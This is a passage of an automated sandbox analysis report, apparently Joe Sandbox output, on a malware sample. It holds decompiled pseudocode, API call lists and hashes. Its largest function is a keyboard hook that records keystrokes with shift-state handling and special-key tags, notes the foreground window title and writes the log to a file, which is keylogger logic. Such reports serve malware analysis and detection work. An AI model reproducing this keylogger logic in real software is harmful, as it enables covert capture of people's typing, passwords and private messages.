                                                                    							_t22 = _v12;
                                                                    							_t41 = _t41 + 1;
                                                                    							if(_t41 <  *((intOrPtr*)(_t38 + 0x18))) {
                                                                    								continue;
                                                                    							} else {
                                                                    								goto L4;
                                                                    							}
                                                                    							goto L5;
                                                                    						}
                                                                    						_t20 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x1c)) + _t31 + ( *( *((intOrPtr*)(_t38 + 0x24)) + _t41 * 2 + _t31) & 0x0000ffff) * 4)) + _t31;
                                                                    					}
                                                                    				}
                                                                    				L5:
                                                                    				return _t20;
                                                                    			}











                                                                    Instruction addresses: 0x02d2096c 0x02d2096d 0x02d20971 0x02d20975 0x02d20979 0x02d2097b 0x02d20983 0x02d2098a 0x02d209b5 0x02d209b5 0x02d2098c 0x02d2098f 0x02d20991 0x02d20997 0x00000000 0x02d20999 0x02d20999 0x02d209a2 0x02d209aa 0x00000000 0x00000000 0x02d209ac 0x02d209af 0x02d209b3 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x02d209b3 0x02d209ce 0x02d209ce 0x02d20997 0x02d209b7 0x02d209bb

                                                                    APIs
                                                                    • lstrcmpA.KERNEL32(?,02D21BD0,?,open,02D21BD0), ref: 02D209A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcmp
                                                                    • String ID:
                                                                    • API String ID: 1534048567-0
                                                                    • Opcode ID: c12c5a12bc6fb33a52d63510f1eb6fedfffcf389a0a98ad67374d8aea3648520
                                                                    • Instruction ID: abe34864749e97cab4486a67f60e133bef99fbee8737dcda73d95906fb1db474
                                                                    • Opcode Fuzzy Hash: c12c5a12bc6fb33a52d63510f1eb6fedfffcf389a0a98ad67374d8aea3648520
                                                                    • Instruction Fuzzy Hash: 8C017171A00624AFD711CF99C881A6AB7F8FF652197050179E442D3701EB30ED59CAE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 87%
                                                                    			E02D22C91(void* __ecx) {
                                                                    				void* _t22;
                                                                    				intOrPtr* _t32;
                                                                    				intOrPtr* _t33;
                                                                    				intOrPtr* _t34;
                                                                    				intOrPtr* _t37;
                                                                    				void* _t42;
                                                                    
                                                                    				_t42 = __ecx;
                                                                    				_t32 =  *((intOrPtr*)(__ecx + 0x34));
                                                                    				if(_t32 != 0) {
                                                                    					 *((intOrPtr*)( *_t32 + 0x24))(_t32);
                                                                    				}
                                                                    				_t33 =  *((intOrPtr*)(_t42 + 0x34));
                                                                    				if(_t33 != 0) {
                                                                    					 *((intOrPtr*)( *_t33 + 8))(_t33);
                                                                    					 *((intOrPtr*)(_t42 + 0x34)) = 0;
                                                                    				}
                                                                    				_t34 =  *((intOrPtr*)(_t42 + 0x18));
                                                                    				if(_t34 != 0) {
                                                                    					 *((intOrPtr*)( *_t34 + 8))(_t34);
                                                                    					 *((intOrPtr*)(_t42 + 0x18)) = 0;
                                                                    				}
                                                                    				_t9 = _t42 + 0x1c; // 0x70d044
                                                                    				E02D124E0(_t9);
                                                                    				_t10 = _t42 + 0x20; // 0x70d048
                                                                    				E02D124E0(_t10);
                                                                    				_t37 =  *((intOrPtr*)(_t42 + 0x24));
                                                                    				if(_t37 != 0) {
                                                                    					 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                                    					 *((intOrPtr*)(_t42 + 0x24)) = 0;
                                                                    				}
                                                                    				_t14 = _t42 + 0x28; // 0x70d050
                                                                    				E02D124E0(_t14);
                                                                    				_t15 = _t42 + 0x2c; // 0x70d054
                                                                    				E02D124E0(_t15);
                                                                    				_t16 = _t42 + 0x30; // 0x70d058
                                                                    				_t22 = E02D124E0(_t16);
                                                                    				 *((intOrPtr*)(_t42 + 0x34)) = 0;
                                                                    				__imp__CoUninitialize(); // executed
                                                                    				return _t22;
                                                                    			}









                                                                    Instruction addresses: 0x02d22c92 0x02d22c95 0x02d22c9a 0x02d22c9f 0x02d22c9f 0x02d22ca2 0x02d22ca9 0x02d22cae 0x02d22cb1 0x02d22cb1 0x02d22cb4 0x02d22cb9 0x02d22cbe 0x02d22cc1 0x02d22cc1 0x02d22cc4 0x02d22cc7 0x02d22ccc 0x02d22ccf 0x02d22cd4 0x02d22cd9 0x02d22cde 0x02d22ce1 0x02d22ce1 0x02d22ce4 0x02d22ce7 0x02d22cec 0x02d22cef 0x02d22cf4 0x02d22cf7 0x02d22cfc 0x02d22cff 0x02d22d07

                                                                    APIs
                                                                    • CoUninitialize.OLE32(?,?,02D2238A,0070D028,02D14D2D), ref: 02D22CFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Uninitialize
                                                                    • String ID:
                                                                    • API String ID: 3861434553-0
                                                                    • Opcode ID: f7278247422903d2fb9073e99440d793db4745c580bf3e7f2add9ea095a8732e
                                                                    • Instruction ID: 0178f418a41735fec04405fbc1680fd77808f436cba50b823cbc4c568fd8c0d6
                                                                    • Opcode Fuzzy Hash: f7278247422903d2fb9073e99440d793db4745c580bf3e7f2add9ea095a8732e
                                                                    • Instruction Fuzzy Hash: 400127752117108BD738DF25D998866B3F4FF687183041A2DA89787A60CB35FC04CE20
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D15E22(long __ecx) {
                                                                    				void* _t1;
                                                                    				long _t7;
                                                                    				void* _t8;
                                                                    
                                                                    				_t7 = __ecx;
                                                                    				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
                                                                    				_t8 = _t1;
                                                                    				E02D15F31(_t8, _t7);
                                                                    				return _t8;
                                                                    			}






                                                                    Instruction addresses: 0x02d15e2b 0x02d15e30 0x02d15e36 0x02d15e3b 0x02d15e45

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,02D133E2,?,02D15A4F,.bss,00000000), ref: 02D15E30
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 26708af83f00e1e84521b48550e05d38533d63517aead9bd9f06165e450f0e90
                                                                    • Instruction ID: 33d15e6515408c662327be9447bb36516fb7acd98c4435592098b9a5dddabb16
                                                                    • Opcode Fuzzy Hash: 26708af83f00e1e84521b48550e05d38533d63517aead9bd9f06165e450f0e90
                                                                    • Instruction Fuzzy Hash: 81C0123234822037F164111A7C1AF5B8A6DCBD1F71F11005AF6048A3C0D8D10C4285A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D19FCE(void* __eax, void* __ecx) {
                                                                    				int _t3;
                                                                    				void* _t5;
                                                                    
                                                                    				_t5 =  *(__ecx + 0x10);
                                                                    				if(_t5 != 0) {
                                                                    					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
                                                                    					return _t3;
                                                                    				} else {
                                                                    					return __eax;
                                                                    				}
                                                                    			}





                                                                    0x02d19fce
                                                                    0x02d19fd3
                                                                    0x02d15ead
                                                                    0x02d15eb3
                                                                    0x02d19fd9
                                                                    0x02d19fd9
                                                                    0x02d19fd9

                                                                    APIs
                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: b80d880c9ad688b2a84335624fa06ab52392e001b0fc8f6d7ac0caf943e89bde
                                                                    • Instruction ID: f239f41fe3f12b83251c040ad32f2519c8f1fd2e9d1f28ba6df860e26283989c
                                                                    • Opcode Fuzzy Hash: b80d880c9ad688b2a84335624fa06ab52392e001b0fc8f6d7ac0caf943e89bde
                                                                    • Instruction Fuzzy Hash: 03B09270B8030067EE3CCB31AC95F2923117BC0B06FA2898CA546DA6C18BAAE805CA04
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D15EB4(long __ecx) {
                                                                    				void* _t1;
                                                                    
                                                                    				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
                                                                    				return _t1;
                                                                    			}




                                                                    0x02d15ebe
                                                                    0x02d15ec4

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,02D13652,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D15EBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 1735e266f8dd48736953eb94796e0865464fff50396b78cc62ec808f8eaae6cd
                                                                    • Instruction ID: 9bb463eac7c377f772a515800b3339c5cbbb7920c4327530a3e234ddd3b54d92
                                                                    • Opcode Fuzzy Hash: 1735e266f8dd48736953eb94796e0865464fff50396b78cc62ec808f8eaae6cd
                                                                    • Instruction Fuzzy Hash: 9DA002B0BD93007AFD795760AE1FF153A18A750F16F310544B70D6D1C055E029548929
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D15EA5(void* __ecx) {
                                                                    				int _t1;
                                                                    
                                                                    				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
                                                                    				return _t1;
                                                                    			}




                                                                    0x02d15ead
                                                                    0x02d15eb3

                                                                    APIs
                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: 629770aa966499011ac0da3927e6b6a8534ae682a65eebdf7a345dc7eeb01a22
                                                                    • Instruction ID: 59083c8e973e993f37eb9336f12ad9dbd14eab00260f758080271bffce8d7424
                                                                    • Opcode Fuzzy Hash: 629770aa966499011ac0da3927e6b6a8534ae682a65eebdf7a345dc7eeb01a22
                                                                    • Instruction Fuzzy Hash: 37A00270AD070066ED7457215D4AF0527146B90B01F228A447645A81D149A5A4588A58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D189D5(signed int __ecx, int __edx, long _a4) {
                                                                    				signed int _v8;
                                                                    				int _v12;
                                                                    				short _v24;
                                                                    				short _v56;
                                                                    				void* _t21;
                                                                    				short _t24;
                                                                    				short _t27;
                                                                    				void* _t36;
                                                                    				int _t46;
                                                                    				signed int _t48;
                                                                    				WCHAR* _t49;
                                                                    				WCHAR* _t50;
                                                                    				long _t57;
                                                                    				void* _t58;
                                                                    				short _t59;
                                                                    				short _t60;
                                                                    				short _t62;
                                                                    				short _t63;
                                                                    				short _t64;
                                                                    				short _t66;
                                                                    				short _t67;
                                                                    				short _t69;
                                                                    				short _t70;
                                                                    				short _t71;
                                                                    				short _t73;
                                                                    				short _t75;
                                                                    				short _t77;
                                                                    				short _t78;
                                                                    				short _t79;
                                                                    				signed int _t81;
                                                                    
                                                                    				_t55 = __edx;
                                                                    				_t48 = __ecx;
                                                                    				_t46 = __ecx;
                                                                    				_v12 = __edx;
                                                                    				_v8 = __ecx;
                                                                    				_t57 = _a4;
                                                                    				_t21 = __edx - 0x100;
                                                                    				if(_t21 == 0 || _t21 == 4) {
                                                                    					_t58 =  *_t57;
                                                                    					if(_t58 < 0x27) {
                                                                    						__eflags = _t58 - 0x40;
                                                                    						if(_t58 <= 0x40) {
                                                                    							L21:
                                                                    							__eflags = _t58 - 0x66;
                                                                    							if(__eflags > 0) {
                                                                    								__eflags = _t58 - 0xbc;
                                                                    								if(__eflags > 0) {
                                                                    									__eflags = _t58 - 0xdb;
                                                                    									if(__eflags > 0) {
                                                                    										_t59 = _t58 - 0xdc;
                                                                    										__eflags = _t59;
                                                                    										if(_t59 == 0) {
                                                                    											_t24 = GetAsyncKeyState(0x10);
                                                                    											_t49 = "|";
                                                                    											__eflags = _t24;
                                                                    											if(__eflags == 0) {
                                                                    												_t49 = "\\";
                                                                    											}
                                                                    											L99:
                                                                    											E02D18E66(_t49, _t55, _t90);
                                                                    											goto L100;
                                                                    										}
                                                                    										_t60 = _t59 - 1;
                                                                    										__eflags = _t60;
                                                                    										if(_t60 == 0) {
                                                                    											_t27 = GetAsyncKeyState(0x10);
                                                                    											_t50 = "}";
                                                                    											_t55 = "]";
                                                                    											L76:
                                                                    											__eflags = _t27;
                                                                    											_t49 =  ==  ? _t55 : _t50;
                                                                    											goto L99;
                                                                    										}
                                                                    										__eflags = _t60 - 1;
                                                                    										if(__eflags == 0) {
                                                                    											_t27 = GetAsyncKeyState(0x10);
                                                                    											_t50 = "\"";
                                                                    											_t55 = "\'";
                                                                    											goto L76;
                                                                    										}
                                                                    										L94:
                                                                    										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
                                                                    										_t49 =  &_v56;
                                                                    										goto L99;
                                                                    									}
                                                                    									if(__eflags == 0) {
                                                                    										_t27 = GetAsyncKeyState(0x10);
                                                                    										_t50 = "{";
                                                                    										_t55 = "[";
                                                                    										goto L76;
                                                                    									}
                                                                    									_t62 = _t58 - 0xbd;
                                                                    									__eflags = _t62;
                                                                    									if(_t62 == 0) {
                                                                    										_t27 = GetAsyncKeyState(0x10);
                                                                    										_t50 = "_";
                                                                    										_t55 = "-";
                                                                    										goto L76;
                                                                    									}
                                                                    									_t63 = _t62 - 1;
                                                                    									__eflags = _t63;
                                                                    									if(_t63 == 0) {
                                                                    										_t27 = GetAsyncKeyState(0x10);
                                                                    										_t50 = ">";
                                                                    										_t55 = ".";
                                                                    										goto L76;
                                                                    									}
                                                                    									_t64 = _t63 - 1;
                                                                    									__eflags = _t64;
                                                                    									if(_t64 == 0) {
                                                                    										_t27 = GetAsyncKeyState(0x10);
                                                                    										_t50 = "?";
                                                                    										_t55 = "/";
                                                                    										goto L76;
                                                                    									}
                                                                    									__eflags = _t64 - 1;
                                                                    									if(__eflags != 0) {
                                                                    										goto L94;
                                                                    									}
                                                                    									_t27 = GetAsyncKeyState(0x10);
                                                                    									_t50 = "~";
                                                                    									_t55 = "`";
                                                                    									goto L76;
                                                                    								}
                                                                    								if(__eflags == 0) {
                                                                    									_t27 = GetAsyncKeyState(0x10);
                                                                    									_t50 = "<";
                                                                    									_t55 = ",";
                                                                    									goto L76;
                                                                    								}
                                                                    								__eflags = _t58 - 0xa3;
                                                                    								if(_t58 > 0xa3) {
                                                                    									__eflags = _t58 - 0xa5;
                                                                    									if(__eflags <= 0) {
                                                                    										L78:
                                                                    										_t49 = L"[ALT]";
                                                                    										goto L99;
                                                                    									}
                                                                    									__eflags = _t58 - 0xba;
                                                                    									if(_t58 == 0xba) {
                                                                    										_t27 = GetAsyncKeyState(0x10);
                                                                    										_t50 = ":";
                                                                    										_t55 = ";";
                                                                    										goto L76;
                                                                    									}
                                                                    									__eflags = _t58 - 0xbb;
                                                                    									if(__eflags != 0) {
                                                                    										goto L94;
                                                                    									}
                                                                    									_t27 = GetAsyncKeyState(0x10);
                                                                    									_t50 = "+";
                                                                    									_t55 = "=";
                                                                    									goto L76;
                                                                    								}
                                                                    								__eflags = _t58 - 0xa2;
                                                                    								if(__eflags >= 0) {
                                                                    									L71:
                                                                    									_t49 = L"[CTRL]";
                                                                    									goto L99;
                                                                    								}
                                                                    								__eflags = _t58 - 0x67;
                                                                    								if(__eflags == 0) {
                                                                    									_t49 = "7";
                                                                    									goto L99;
                                                                    								}
                                                                    								__eflags = _t58 - 0x68;
                                                                    								if(__eflags == 0) {
                                                                    									_t49 = "8";
                                                                    									goto L99;
                                                                    								}
                                                                    								__eflags = _t58 - 0x69;
                                                                    								if(__eflags == 0) {
                                                                    									_t49 = "9";
                                                                    									goto L99;
                                                                    								}
                                                                    								__eflags = _t58 - 0xa0 - 1;
                                                                    								if(__eflags > 0) {
                                                                    									goto L94;
                                                                    								}
                                                                    								goto L100;
                                                                    							}
                                                                    							if(__eflags == 0) {
                                                                    								_t49 = "6";
                                                                    								goto L99;
                                                                    							}
                                                                    							__eflags = _t58 - 0x20;
                                                                    							if(__eflags > 0) {
                                                                    								__eflags = _t58 - 0x62;
                                                                    								if(__eflags > 0) {
                                                                    									_t66 = _t58 - 0x63;
                                                                    									__eflags = _t66;
                                                                    									if(__eflags == 0) {
                                                                    										_t49 = "3";
                                                                    										goto L99;
                                                                    									}
                                                                    									_t67 = _t66 - 1;
                                                                    									__eflags = _t67;
                                                                    									if(__eflags == 0) {
                                                                    										_t49 = "4";
                                                                    										goto L99;
                                                                    									}
                                                                    									__eflags = _t67 - 1;
                                                                    									if(__eflags != 0) {
                                                                    										goto L94;
                                                                    									}
                                                                    									_t49 = "5";
                                                                    									goto L99;
                                                                    								}
                                                                    								if(__eflags == 0) {
                                                                    									_t49 = "2";
                                                                    									goto L99;
                                                                    								}
                                                                    								_t69 = _t58 - 0x2d;
                                                                    								__eflags = _t69;
                                                                    								if(__eflags == 0) {
                                                                    									_t49 = L"[INSERT]";
                                                                    									goto L99;
                                                                    								}
                                                                    								_t70 = _t69 - 1;
                                                                    								__eflags = _t70;
                                                                    								if(__eflags == 0) {
                                                                    									_t49 = L"[DEL]";
                                                                    									goto L99;
                                                                    								}
                                                                    								_t71 = _t70 - 0x32;
                                                                    								__eflags = _t71;
                                                                    								if(__eflags == 0) {
                                                                    									_t49 = "0";
                                                                    									goto L99;
                                                                    								}
                                                                    								__eflags = _t71 - 1;
                                                                    								if(__eflags != 0) {
                                                                    									goto L94;
                                                                    								}
                                                                    								_t49 = "1";
                                                                    								goto L99;
                                                                    							}
                                                                    							if(__eflags == 0) {
                                                                    								_t49 = " ";
                                                                    								goto L99;
                                                                    							}
                                                                    							__eflags = _t58 - 0x11;
                                                                    							if(__eflags > 0) {
                                                                    								_t73 = _t58 - 0x12;
                                                                    								__eflags = _t73;
                                                                    								if(__eflags == 0) {
                                                                    									goto L78;
                                                                    								}
                                                                    								_t75 = _t73;
                                                                    								__eflags = _t75;
                                                                    								if(__eflags == 0) {
                                                                    									_t49 = L"[CAPS]";
                                                                    									goto L99;
                                                                    								}
                                                                    								__eflags = _t75 - 7;
                                                                    								if(__eflags != 0) {
                                                                    									goto L94;
                                                                    								}
                                                                    								_t49 = L"[ESC]";
                                                                    								goto L99;
                                                                    							}
                                                                    							if(__eflags == 0) {
                                                                    								goto L71;
                                                                    							}
                                                                    							_t77 = _t58 - 8;
                                                                    							__eflags = _t77;
                                                                    							if(__eflags == 0) {
                                                                    								_t49 = L"[BKSP]";
                                                                    								goto L99;
                                                                    							}
                                                                    							_t78 = _t77 - 1;
                                                                    							__eflags = _t78;
                                                                    							if(__eflags == 0) {
                                                                    								_t49 = L"[TAB]";
                                                                    								goto L99;
                                                                    							}
                                                                    							_t79 = _t78 - 4;
                                                                    							__eflags = _t79;
                                                                    							if(__eflags == 0) {
                                                                    								_t49 = L"[ENTER]\r\n";
                                                                    								goto L99;
                                                                    							}
                                                                    							__eflags = _t79 - 3;
                                                                    							if(__eflags == 0) {
                                                                    								goto L100;
                                                                    							}
                                                                    							goto L94;
                                                                    						}
                                                                    						L19:
                                                                    						__eflags = _t58 - 0x5b;
                                                                    						if(_t58 >= 0x5b) {
                                                                    							goto L21;
                                                                    						}
                                                                    						_t36 = E02D18E5B();
                                                                    						__eflags = GetAsyncKeyState(0x10);
                                                                    						__eflags = E02D18E49(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
                                                                    						_t53 =  !=  ? _t58 : _t58 + 0x20;
                                                                    						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
                                                                    						E02D18E66( &_v24, _t36, __eflags);
                                                                    						_t46 = _v8;
                                                                    						goto L100;
                                                                    					}
                                                                    					if(_t58 > 0x40) {
                                                                    						goto L19;
                                                                    					}
                                                                    					if(GetAsyncKeyState(0x10) == 0) {
                                                                    						wsprintfW( &_v24, L"%c", _t58);
                                                                    						_t49 =  &_v24;
                                                                    						goto L99;
                                                                    					}
                                                                    					_t81 = _t58 + 0xffffffd0;
                                                                    					_t90 = _t81 - 9;
                                                                    					if(_t81 > 9) {
                                                                    						goto L100;
                                                                    					}
                                                                    					switch( *((intOrPtr*)(_t81 * 4 +  &M02D18E21))) {
                                                                    						case 0:
                                                                    							_t49 = ")";
                                                                    							goto L99;
                                                                    						case 1:
                                                                    							__ecx = "!";
                                                                    							goto L99;
                                                                    						case 2:
                                                                    							__ecx = "@";
                                                                    							goto L99;
                                                                    						case 3:
                                                                    							__ecx = "#";
                                                                    							goto L99;
                                                                    						case 4:
                                                                    							__ecx = "$";
                                                                    							goto L99;
                                                                    						case 5:
                                                                    							__ecx = "%";
                                                                    							goto L99;
                                                                    						case 6:
                                                                    							__ecx = "^";
                                                                    							goto L99;
                                                                    						case 7:
                                                                    							__ecx = "&";
                                                                    							goto L99;
                                                                    						case 8:
                                                                    							__ecx = "*";
                                                                    							goto L99;
                                                                    						case 9:
                                                                    							__ecx = "(";
                                                                    							goto L99;
                                                                    					}
                                                                    				} else {
                                                                    					L100:
                                                                    					return CallNextHookEx(0, _t46, _v12, _t57);
                                                                    				}
                                                                    			}
                                                                    0x02d18ac7
                                                                    0x02d18ad4
                                                                    0x02d18adc
                                                                    0x02d18ae6
                                                                    0x02d18af2
                                                                    0x02d18af7
                                                                    0x00000000
                                                                    0x02d18af7
                                                                    0x02d18a09
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a1a
                                                                    0x02d18a9d
                                                                    0x02d18aa6
                                                                    0x00000000
                                                                    0x02d18aa6
                                                                    0x02d18a1c
                                                                    0x02d18a1f
                                                                    0x02d18a22
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a28
                                                                    0x00000000
                                                                    0x02d18a2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a39
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a43
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a4d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a57
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a61
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a6b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a75
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a7f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a89
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18e0b
                                                                    0x02d18e0b
                                                                    0x02d18e1c
                                                                    0x02d18e1c

                                                                    APIs
                                                                    • GetAsyncKeyState.USER32(00000010), ref: 02D18A11
                                                                    • CallNextHookEx.USER32 ref: 02D18E12
                                                                      • Part of subcall function 02D18E66: GetForegroundWindow.USER32(?,?,?), ref: 02D18E8F
                                                                      • Part of subcall function 02D18E66: GetWindowTextW.USER32 ref: 02D18EA2
                                                                      • Part of subcall function 02D18E66: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 02D18F0B
                                                                      • Part of subcall function 02D18E66: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 02D18F79
                                                                      • Part of subcall function 02D18E66: lstrlenW.KERNEL32(02D24AD0,00000008,00000000,?,?), ref: 02D18FA2
                                                                      • Part of subcall function 02D18E66: WriteFile.KERNEL32(?,02D24AD0,00000000,?,?), ref: 02D18FAE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                                                    • String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
                                                                    • API String ID: 2452648998-4143582258
                                                                    • Opcode ID: 31ed34bdb0f454a13f8c8e3eb9cc1091eee06edbb065cea15b4a93608686c7e4
